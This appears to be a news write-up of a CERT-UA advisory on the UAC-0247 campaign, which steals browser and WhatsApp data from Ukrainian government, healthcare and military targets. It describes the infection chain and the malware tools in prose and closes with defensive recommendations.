A sophisticated cyberattack campaign, tracked as UAC-0247, has been actively targeting critical local government and municipal healthcare institutions across Ukraine since early 2026. The threat actors are specifically aimed at stealing sensitive data from internet browsers and WhatsApp, and are methodically expanding their reach within compromised networks.
The campaign initiates with deceptively crafted emails posing as discussions about humanitarian aid. These emails urge recipients to click on a malicious link. To enhance credibility, attackers are leveraging artificial intelligence to create fake websites or exploiting Cross-Site Scripting (XSS) vulnerabilities on legitimate third-party sites. Upon clicking the link, an archive file is downloaded, which, when opened, executes a shortcut file. This, in turn, triggers the processing of a remote HTA file, distracting the victim while a background process installs and launches an executable via a scheduled task.
CERT-UA analysts have documented this activity as part of a significant surge in cyberattacks observed during March and April 2026. This same threat cluster has also been implicated in targeting elements of Ukraine’s Defense Forces and operators of FPV drones. For instance, on March 10, 2026, an archive named “bachu.zip” was distributed via the Signal messenger, masquerading as an updated version of the “BACHU” software tool used by FPV operators. The archive contained a DLL file designed to launch the AGINGFLY malware through a DLL side-loading technique upon execution of the main program.
Inside the UAC-0247 Campaign: Data Theft and Network Expansion
Analysis of numerous cyber incidents linked to this campaign reveals a consistent pattern of data exfiltration and network reconnaissance. Attackers employ CHROMELEVATOR to extract authentication data and stored credentials from internet browsers. Concurrently, a distinct tool named ZAPIXDESK is utilized specifically for pilfering data from WhatsApp messenger applications.
In parallel with these data theft operations, the threat actors are actively engaged in mapping internal networks. They utilize basic subnet scanners and the publicly available RUSTSCAN tool for this purpose. In some instances, the LIGOLO-NG and CHISEL tools have been deployed to establish covert network tunnels. One discovered incident also involved the use of the XMRIG cryptocurrency miner, disguised as a DLL and loaded through a tampered version of the legitimate WIREGUARD program.
The AGINGFLY Malware and Persistent Footholds
The primary remote access tool employed throughout this campaign is AGINGFLY, a C# programmed malware offering comprehensive remote control functionalities. These include command execution, file downloading, screenshot capture, keylogger activation, and in-memory code execution.
A notable characteristic of AGINGFLY is its distinct approach to command handlers. Rather than embedding them within the malware itself, these handlers are downloaded as source code from the command-and-control (C2) server and compiled dynamically on the infected system. Communication with the C2 server is managed through web sockets, with all traffic encrypted using the AES-CBC algorithm and a static key.
To ensure persistent access, the campaign also leverages a PowerShell script known as SILENTLOOP. This script automates command execution, updates its configuration, and retrieves the latest C2 server IP address from a designated Telegram channel. SILENTLOOP incorporates backup mechanisms to locate the C2 address should the primary Telegram source become unavailable.
Initial access is typically established through either a TCP reverse shell or RAVENSHELL, which creates an encrypted TCP connection using a 9-byte XOR key and communicates with the management server via CMD. CERT-UA recommends that organizations mitigate their vulnerability by restricting the execution of LNK, HTA, and JS files on endpoint systems. Furthermore, administrators are advised to limit the use of legitimate utilities such as mshta.exe, powershell.exe, and wscript.exe, which are actively exploited by this campaign. These recommended restrictions align with fundamental attack surface reduction practices integrated into operating systems and do not necessitate the deployment of third-party tools.
The ongoing nature of the UAC-0247 campaign suggests continued targeting of Ukrainian healthcare and government entities. The observed utilization of advanced techniques and novel malware components indicates a persistent and evolving threat. Organizations within the affected sectors should remain vigilant and ensure their security postures are robust and up-to-date in response to these persistent cyber threats.